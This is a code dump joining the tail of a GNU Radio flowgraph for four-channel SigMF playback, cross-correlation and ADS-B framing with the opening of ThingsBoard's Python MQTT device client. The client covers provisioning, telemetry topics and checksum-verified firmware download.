self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.blocks_sub_xx_0_0_0, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0, 0), (self.qtgui_time_sink_x_0_1_1_1, 0))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0, 0), (self.blocks_sub_xx_0, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0, 0), (self.qtgui_time_sink_x_0_1_1_1, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_0, 0), (self.blocks_sub_xx_0_0, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_0, 0), (self.qtgui_time_sink_x_0_1_1_1, 2))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_1, 0), (self.blocks_sub_xx_0_0_0, 1))
self.connect((self.blocks_multiply_const_vxx_1_0_1_0_0_1, 0), (self.qtgui_time_sink_x_0_1_1_1, 3))
self.connect((self.blocks_short_to_float_0, 0), (self.blocks_add_const_vxx_0, 0))
self.connect((self.blocks_short_to_float_0_0, 0), (self.blocks_add_const_vxx_0_0, 0))
self.connect((self.blocks_short_to_float_0_0_0, 0), (self.blocks_add_const_vxx_0_0_0, 0))
self.connect((self.blocks_skiphead_0, 0), (self.blocks_throttle_0, 0))
self.connect((self.blocks_skiphead_1, 0), (self.blocks_throttle_1, 0))
self.connect((self.blocks_skiphead_2, 0), (self.blocks_throttle_2, 0))
self.connect((self.blocks_skiphead_3, 0), (self.blocks_throttle_3, 0))
self.connect((self.blocks_stream_to_vector_0, 0), (self.fft_vxx_0, 0))
self.connect((self.blocks_stream_to_vector_0_0, 0), (self.fft_vxx_1, 0))
self.connect((self.blocks_stream_to_vector_0_0_0, 0), (self.fft_vxx_1_0, 0))
self.connect((self.blocks_stream_to_vector_0_0_0_0, 0), (self.fft_vxx_1_0_0, 0))
self.connect((self.blocks_stream_to_vector_0_1, 0), (self.fft_vxx_0_1, 0))
self.connect((self.blocks_stream_to_vector_0_1_0, 0), (self.fft_vxx_0_1_0, 0))
self.connect((self.blocks_sub_xx_0, 0), (self.qtgui_time_sink_x_2, 0))
self.connect((self.blocks_sub_xx_0_0, 0), (self.qtgui_time_sink_x_2, 1))
self.connect((self.blocks_sub_xx_0_0_0, 0), (self.qtgui_time_sink_x_2, 2))
self.connect((self.blocks_throttle_0, 0), (self.analog_agc2_xx_0, 0))
self.connect((self.blocks_throttle_1, 0), (self.analog_agc2_xx_0_1, 0))
self.connect((self.blocks_throttle_2, 0), (self.analog_agc2_xx_0_2, 0))
self.connect((self.blocks_throttle_3, 0), (self.analog_agc2_xx_0_3, 0))
self.connect((self.fft_vxx_0, 0), (self.blocks_multiply_conjugate_cc_0, 0))
self.connect((self.fft_vxx_0_0, 0), (self.blocks_complex_to_mag_0, 0))
self.connect((self.fft_vxx_0_0_0, 0), (self.blocks_complex_to_mag_0_0, 0))
self.connect((self.fft_vxx_0_0_0_0, 0), (self.blocks_complex_to_mag_0_0_0, 0))
self.connect((self.fft_vxx_0_1, 0), (self.blocks_multiply_conjugate_cc_0_0, 0))
self.connect((self.fft_vxx_0_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 0))
self.connect((self.fft_vxx_1, 0), (self.blocks_multiply_conjugate_cc_0, 1))
self.connect((self.fft_vxx_1_0, 0), (self.blocks_multiply_conjugate_cc_0_0, 1))
self.connect((self.fft_vxx_1_0_0, 0), (self.blocks_multiply_conjugate_cc_0_0_0, 1))
self.connect((self.sigmf_source_0, 0), (self.blocks_skiphead_0, 0))
self.connect((self.sigmf_source_1, 0), (self.blocks_skiphead_1, 0))
self.connect((self.sigmf_source_2, 0), (self.blocks_skiphead_2, 0))
self.connect((self.sigmf_source_3, 0), (self.blocks_skiphead_3, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_argmax_xx_0, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.blocks_max_xx_0, 0))
self.connect((self.single_pole_iir_filter_xx_0, 0), (self.qtgui_vector_sink_f_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_argmax_xx_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.blocks_max_xx_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0, 0), (self.qtgui_vector_sink_f_0, 1))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_argmax_xx_0_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.blocks_max_xx_0_0_0, 0))
self.connect((self.single_pole_iir_filter_xx_0_0_0, 0), (self.qtgui_vector_sink_f_0, 2))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback4")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_function_probe_0_3(self):
return self.function_probe_0_3
def set_function_probe_0_3(self, function_probe_0_3):
self.function_probe_0_3 = function_probe_0_3
self.set_samp_offset_0_3(self._samp_offset_0_3_formatter(self.function_probe_0_3))
self.blocks_delay_3_0.set_dly(self.delay_3 + int(self.function_probe_0_3)+self.manual_fine_delay_3)
def get_function_probe_0_2(self):
return self.function_probe_0_2
def set_function_probe_0_2(self, function_probe_0_2):
self.function_probe_0_2 = function_probe_0_2
self.set_samp_offset_0_2(self._samp_offset_0_2_formatter(self.function_probe_0_2))
self.blocks_delay_2_0.set_dly(self.delay_2 + int(self.function_probe_0_2) + self.manual_fine_delay_2)
def get_function_probe_0_1(self):
return self.function_probe_0_1
def set_function_probe_0_1(self, function_probe_0_1):
self.function_probe_0_1 = function_probe_0_1
self.set_samp_offset_0_1(self._samp_offset_0_1_formatter(self.function_probe_0_1))
self.blocks_delay_1_0.set_dly(self.delay_1 + int(self.function_probe_0_1) + self.manual_fine_delay_1)
def get_trig_delay(self):
return self.trig_delay
def set_trig_delay(self, trig_delay):
self.trig_delay = trig_delay
Qt.QMetaObject.invokeMethod(self._trig_delay_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.trig_delay)))
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
def get_trig_channel(self):
return self.trig_channel
def set_trig_channel(self, trig_channel):
self.trig_channel = trig_channel
self._trig_channel_callback(self.trig_channel)
self.qtgui_time_sink_x_0_1_1_0.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_comp, 0.0001, self.trig_channel, "")
self.qtgui_time_sink_x_0_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, 0.0001, self.trig_channel, "")
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
def get_throttle(self):
return self.throttle
def set_throttle(self, throttle):
self.throttle = throttle
Qt.QMetaObject.invokeMethod(self._throttle_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.throttle)))
self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
def get_thresh_phase(self):
return self.thresh_phase
def set_thresh_phase(self, thresh_phase):
self.thresh_phase = thresh_phase
Qt.QMetaObject.invokeMethod(self._thresh_phase_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh_phase)))
self.qtgui_time_sink_x_2.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_phase, 0.00005, 3, "")
self.qtgui_time_sink_x_0_1_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_phase, 0.00005, 4, "")
def get_thresh_comp(self):
return self.thresh_comp
def set_thresh_comp(self, thresh_comp):
self.thresh_comp = thresh_comp
Qt.QMetaObject.invokeMethod(self._thresh_comp_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh_comp)))
self.qtgui_time_sink_x_0_1_1_0.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_comp, 0.0001, self.trig_channel, "")
def get_thresh(self):
return self.thresh
def set_thresh(self, thresh):
self.thresh = thresh
Qt.QMetaObject.invokeMethod(self._thresh_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh)))
self.qtgui_time_sink_x_0_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, 0.0001, self.trig_channel, "")
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
self.analog_const_source_x_0_0_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0_0.set_offset(self.thresh)
self.analog_const_source_x_0_0.set_offset(self.thresh)
self.analog_const_source_x_0.set_offset(self.thresh)
self.adsb_framer_1_0_0_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0_0.set_threshold(self.thresh)
self.adsb_framer_1_0.set_threshold(self.thresh)
self.adsb_framer_1.set_threshold(self.thresh)
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.qtgui_waterfall_sink_x_0_0_1.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_waterfall_sink_x_0.set_frequency_range(0, self.samp_rate)
self.qtgui_time_sink_x_2.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
self.qtgui_time_sink_x_0_1_1_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_1_1_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_1_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1_0.set_samp_rate(int(self.samp_rate))
self.qtgui_time_sink_x_0_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0_1.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0_0.set_samp_rate(self.samp_rate)
self.qtgui_time_sink_x_0.set_samp_rate(self.samp_rate)
self.qtgui_freq_sink_x_0_1_0.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0_1.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0_0.set_frequency_range(0, self.samp_rate)
self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)
self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
def get_samp_offset_0_3(self):
return self.samp_offset_0_3
def set_samp_offset_0_3(self, samp_offset_0_3):
self.samp_offset_0_3 = samp_offset_0_3
Qt.QMetaObject.invokeMethod(self._samp_offset_0_3_label, "setText", Qt.Q_ARG("QString", self.samp_offset_0_3))
def get_samp_offset_0_2(self):
return self.samp_offset_0_2
def set_samp_offset_0_2(self, samp_offset_0_2):
self.samp_offset_0_2 = samp_offset_0_2
Qt.QMetaObject.invokeMethod(self._samp_offset_0_2_label, "setText", Qt.Q_ARG("QString", self.samp_offset_0_2))
def get_samp_offset_0_1(self):
return self.samp_offset_0_1
def set_samp_offset_0_1(self, samp_offset_0_1):
self.samp_offset_0_1 = samp_offset_0_1
Qt.QMetaObject.invokeMethod(self._samp_offset_0_1_label, "setText", Qt.Q_ARG("QString", self.samp_offset_0_1))
def get_nfft(self):
return self.nfft
def set_nfft(self, nfft):
self.nfft = nfft
self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
self.blocks_add_const_vxx_0_0_0.set_k((-self.nfft / 2, ))
self.blocks_add_const_vxx_0_0.set_k((-self.nfft / 2, ))
self.blocks_add_const_vxx_0.set_k((-self.nfft / 2, ))
def get_manual_fine_delay_3(self):
return self.manual_fine_delay_3
def set_manual_fine_delay_3(self, manual_fine_delay_3):
self.manual_fine_delay_3 = manual_fine_delay_3
Qt.QMetaObject.invokeMethod(self._manual_fine_delay_3_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_3)))
self.blocks_delay_3_0.set_dly(self.delay_3 + int(self.function_probe_0_3)+self.manual_fine_delay_3)
def get_manual_fine_delay_2(self):
return self.manual_fine_delay_2
def set_manual_fine_delay_2(self, manual_fine_delay_2):
self.manual_fine_delay_2 = manual_fine_delay_2
Qt.QMetaObject.invokeMethod(self._manual_fine_delay_2_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_2)))
self.blocks_delay_2_0.set_dly(self.delay_2 + int(self.function_probe_0_2) + self.manual_fine_delay_2)
def get_manual_fine_delay_1(self):
return self.manual_fine_delay_1
def set_manual_fine_delay_1(self, manual_fine_delay_1):
self.manual_fine_delay_1 = manual_fine_delay_1
Qt.QMetaObject.invokeMethod(self._manual_fine_delay_1_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_1)))
self.blocks_delay_1_0.set_dly(self.delay_1 + int(self.function_probe_0_1) + self.manual_fine_delay_1)
def get_manual_fine_delay_0(self):
return self.manual_fine_delay_0
def set_manual_fine_delay_0(self, manual_fine_delay_0):
self.manual_fine_delay_0 = manual_fine_delay_0
Qt.QMetaObject.invokeMethod(self._manual_fine_delay_0_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_0)))
self.blocks_delay_0_0.set_dly(self.delay_0 + self.manual_fine_delay_0)
def get_delay_3(self):
return self.delay_3
def set_delay_3(self, delay_3):
self.delay_3 = delay_3
Qt.QMetaObject.invokeMethod(self._delay_3_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_3)))
self.blocks_delay_3_0.set_dly(self.delay_3 + int(self.function_probe_0_3)+self.manual_fine_delay_3)
self.blocks_delay_3.set_dly(self.delay_3)
def get_delay_2(self):
return self.delay_2
def set_delay_2(self, delay_2):
self.delay_2 = delay_2
Qt.QMetaObject.invokeMethod(self._delay_2_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_2)))
self.blocks_delay_2_0.set_dly(self.delay_2 + int(self.function_probe_0_2) + self.manual_fine_delay_2)
self.blocks_delay_2.set_dly(self.delay_2)
def get_delay_1(self):
return self.delay_1
def set_delay_1(self, delay_1):
self.delay_1 = delay_1
Qt.QMetaObject.invokeMethod(self._delay_1_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_1)))
self.blocks_delay_1_0.set_dly(self.delay_1 + int(self.function_probe_0_1) + self.manual_fine_delay_1)
self.blocks_delay_1.set_dly(self.delay_1)
def get_delay_0(self):
return self.delay_0
def set_delay_0(self, delay_0):
self.delay_0 = delay_0
Qt.QMetaObject.invokeMethod(self._delay_0_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_0)))
self.blocks_delay_0_0.set_dly(self.delay_0 + self.manual_fine_delay_0)
self.blocks_delay_0.set_dly(self.delay_0)
def get_corr_alpha_0_3(self):
return self.corr_alpha_0_3
def set_corr_alpha_0_3(self, corr_alpha_0_3):
self.corr_alpha_0_3 = corr_alpha_0_3
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_3_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_3)))
self.single_pole_iir_filter_xx_0_0_0.set_taps(self.corr_alpha_0_3)
def get_corr_alpha_0_2(self):
return self.corr_alpha_0_2
def set_corr_alpha_0_2(self, corr_alpha_0_2):
self.corr_alpha_0_2 = corr_alpha_0_2
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_2_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_2)))
self.single_pole_iir_filter_xx_0_0.set_taps(self.corr_alpha_0_2)
def get_corr_alpha_0_1(self):
return self.corr_alpha_0_1
def set_corr_alpha_0_1(self, corr_alpha_0_1):
self.corr_alpha_0_1 = corr_alpha_0_1
Qt.QMetaObject.invokeMethod(self._corr_alpha_0_1_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_1)))
self.single_pole_iir_filter_xx_0.set_taps(self.corr_alpha_0_1)
def main(top_block_cls=kerberos_sigmf_playback4, options=None):
from distutils.version import StrictVersion
if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
style = gr.prefs().get_string('qtgui', 'style', 'raster')
Qt.QApplication.setGraphicsSystem(style)
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls()
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
qapp.exec_()
if __name__ == '__main__':
main()
|
tb_device_mqtt.py | # Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import paho.mqtt.client as paho
from math import ceil
import logging
import time
import queue
from json import loads, dumps
from jsonschema import Draft7Validator
import ssl
from jsonschema import ValidationError
from threading import RLock
from threading import Thread
from sdk_utils import verify_checksum
KV_SCHEMA = {
"type": "object",
"patternProperties":
{
".": {"type": ["integer",
"string",
"boolean",
"number",
"object"]}
},
"minProperties": 1,
}
SCHEMA_FOR_CLIENT_RPC = {
"type": "object",
"patternProperties":
{
".": {"type": ["integer",
"string",
"boolean",
"number"]}
},
"minProperties": 0,
}
TS_KV_SCHEMA = {
"type": "object",
"properties": {
"ts": {
"type": "integer"
},
"values": KV_SCHEMA
},
"additionalProperties": False
}
DEVICE_TS_KV_SCHEMA = {
"type": "array",
"items": TS_KV_SCHEMA
}
DEVICE_TS_OR_KV_SCHEMA = {
"type": "array",
"items": {
"anyOf":
[
TS_KV_SCHEMA,
KV_SCHEMA
]
}
}
RPC_VALIDATOR = Draft7Validator(SCHEMA_FOR_CLIENT_RPC)
KV_VALIDATOR = Draft7Validator(KV_SCHEMA)
TS_KV_VALIDATOR = Draft7Validator(TS_KV_SCHEMA)
DEVICE_TS_KV_VALIDATOR = Draft7Validator(DEVICE_TS_KV_SCHEMA)
DEVICE_TS_OR_KV_VALIDATOR = Draft7Validator(DEVICE_TS_OR_KV_SCHEMA)
FW_TITLE_ATTR = "fw_title"
FW_VERSION_ATTR = "fw_version"
FW_CHECKSUM_ATTR = "fw_checksum"
FW_CHECKSUM_ALG_ATTR = "fw_checksum_algorithm"
FW_SIZE_ATTR = "fw_size"
FW_STATE_ATTR = "fw_state"
REQUIRED_SHARED_KEYS = f"{FW_CHECKSUM_ATTR},{FW_CHECKSUM_ALG_ATTR},{FW_SIZE_ATTR},{FW_TITLE_ATTR},{FW_VERSION_ATTR}"
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
CLAIMING_TOPIC = 'v1/devices/me/claim'
PROVISION_TOPIC_REQUEST = '/provision/request'
PROVISION_TOPIC_RESPONSE = '/provision/response'
log = logging.getLogger(__name__)
RESULT_CODES = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class ProvisionClient(paho.Client):
PROVISION_REQUEST_TOPIC = "/provision/request"
PROVISION_RESPONSE_TOPIC = "/provision/response"
def __init__(self, host, port, provision_request):
super().__init__()
self._host = host
self._port = port
self._username = "provision"
self.on_connect = self.__on_connect
self.on_message = self.__on_message
self.__provision_request = provision_request
def __on_connect(self, client, userdata, flags, rc): # Callback for connect
if rc == 0:
log.info("[Provisioning client] Connected to ThingsBoard ")
client.subscribe(self.PROVISION_RESPONSE_TOPIC) # Subscribe to provisioning response topic
provision_request = dumps(self.__provision_request)
log.info("[Provisioning client] Sending provisioning request %s" % provision_request)
client.publish(self.PROVISION_REQUEST_TOPIC, provision_request) # Publishing provisioning request topic
else:
log.info("[Provisioning client] Cannot connect to ThingsBoard!, result: %s" % RESULT_CODES[rc])
def __on_message(self, client, userdata, msg):
decoded_payload = msg.payload.decode("UTF-8")
log.info("[Provisioning client] Received data from ThingsBoard: %s" % decoded_payload)
decoded_message = loads(decoded_payload)
provision_device_status = decoded_message.get("status")
if provision_device_status == "SUCCESS":
self.__credentials = decoded_message["credentialsValue"]
else:
log.error("[Provisioning client] Provisioning was unsuccessful with status %s and message: %s" % (
provision_device_status, decoded_message["errorMsg"]))
self.disconnect()
def provision(self):
log.info("[Provisioning client] Connecting to ThingsBoard")
self.__credentials = None
self.connect(self._host, self._port, 60)
self.loop_forever()
def get_credentials(self):
return self.__credentials
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, token=None, port=1883, quality_of_service=None, chunk_size=0):
self._client = paho.Client()
self.quality_of_service = quality_of_service if quality_of_service is not None else 1
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
self.current_firmware_info = {
"current_" + FW_TITLE_ATTR: "Initial",
"current_" + FW_VERSION_ATTR: "v0"
}
self.__request_id = 0
self.__firmware_request_id = 0
self.__chunk_size = chunk_size
self.firmware_received = False
self.__updating_thread = Thread(target=self.__update_thread, name="Updating thread")
self.__updating_thread.daemon = True
# TODO: enable configuration available here:
# https://pypi.org/project/paho-mqtt/#option-functions
def _on_log(self, client, userdata, level, buf):
# if isinstance(buf, Exception):
# log.exception(buf)
# else:
# log.debug("%s - %s - %s - %s", client, userdata, level, buf)
pass
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, result_code):
prev_level = log.level
log.setLevel("DEBUG")
log.debug("Disconnected client: %s, user data: %s, result code: %s", str(client), str(userdata),
str(result_code))
log.setLevel(prev_level)
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
if self.__connect_callback:
time.sleep(.05)
self.__connect_callback(self, userdata, flags, result_code, *extra_params)
if result_code == 0:
self.__is_connected = True
log.info("connection SUCCESS")
self._client.subscribe(ATTRIBUTES_TOPIC, qos=self.quality_of_service)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", qos=self.quality_of_service)
self._client.subscribe(RPC_REQUEST_TOPIC + '+', qos=self.quality_of_service)
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=self.quality_of_service)
else:
if result_code in RESULT_CODES:
log.error("connection FAIL with error %s %s", result_code, RESULT_CODES[result_code])
else:
log.error("connection FAIL with unknown error")
def get_firmware_update(self):
self._client.subscribe("v2/fw/response/+")
self.send_telemetry(self.current_firmware_info)
self.__request_firmware_info()
self.__updating_thread.start()
def __request_firmware_info(self):
self.__request_id = self.__request_id + 1
self._client.publish(f"v1/devices/me/attributes/request/{self.__request_id}",
dumps({"sharedKeys": REQUIRED_SHARED_KEYS}))
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None,
key_file=None, keepalive=120):
if tls:
try:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
except ValueError:
pass
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
self.reconnect_delay_set(min_reconnect_delay, timeout)
while not self.__is_connected and not self.stopped:
log.info("Trying to connect to %s...", self.__host)
time.sleep(1)
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
self.disconnect()
def _on_message(self, client, userdata, message):
update_response_pattern = "v2/fw/response/" + str(self.__firmware_request_id) + "/chunk/"
if message.topic.startswith("v1/devices/me/attributes"):
self.firmware_info = loads(message.payload)
if "/response/" in message.topic:
self.firmware_info = self.firmware_info.get("shared", {}) if isinstance(self.firmware_info,
dict) else {}
if (self.firmware_info.get(FW_VERSION_ATTR) is not None and self.firmware_info.get(
FW_VERSION_ATTR) != self.current_firmware_info.get("current_" + FW_VERSION_ATTR)) or \
(self.firmware_info.get(FW_TITLE_ATTR) is not None and self.firmware_info.get(
FW_TITLE_ATTR) != self.current_firmware_info.get("current_" + FW_TITLE_ATTR)):
log.debug('Firmware is not the same')
self.firmware_data = b''
self.__current_chunk = 0
self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADING"
self.send_telemetry(self.current_firmware_info)
time.sleep(1)
self.__firmware_request_id = self.__firmware_request_id + 1
self.__target_firmware_length = self.firmware_info[FW_SIZE_ATTR]
self.__chunk_count = 0 if not self.__chunk_size else ceil(
self.firmware_info[FW_SIZE_ATTR] / self.__chunk_size)
self.__get_firmware()
elif message.topic.startswith(update_response_pattern):
firmware_data = message.payload
self.firmware_data = self.firmware_data + firmware_data
self.__current_chunk = self.__current_chunk + 1
log.debug('Getting chunk with number: %s. Chunk size is : %r byte(s).' % (self.__current_chunk, self.__chunk_size))
if len(self.firmware_data) == self.__target_firmware_length:
self.__process_firmware()
else:
self.__get_firmware()
else:
content = self._decode(message)
self._on_decoded_message(self, content, message)
def __process_firmware(self):
self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADED"
self.send_telemetry(self.current_firmware_info)
time.sleep(1)
verification_result = verify_checksum(self.firmware_data, self.firmware_info.get(FW_CHECKSUM_ALG_ATTR),
self.firmware_info.get(FW_CHECKSUM_ATTR))
if verification_result:
log.debug('Checksum verified!')
self.current_firmware_info[FW_STATE_ATTR] = "VERIFIED"
self.send_telemetry(self.current_firmware_info)
time.sleep(1)
else:
log.debug('Checksum verification failed!')
self.current_firmware_info[FW_STATE_ATTR] = "FAILED"
self.send_telemetry(self.current_firmware_info)
self.__request_firmware_info()
return
self.firmware_received = True
def __get_firmware(self):
payload = '' if not self.__chunk_size or self.__chunk_size > self.firmware_info.get(FW_SIZE_ATTR, 0) else str(
self.__chunk_size).encode()
self._client.publish(f"v2/fw/request/{self.__firmware_request_id}/chunk/{self.__current_chunk}",
payload=payload, qos=1)
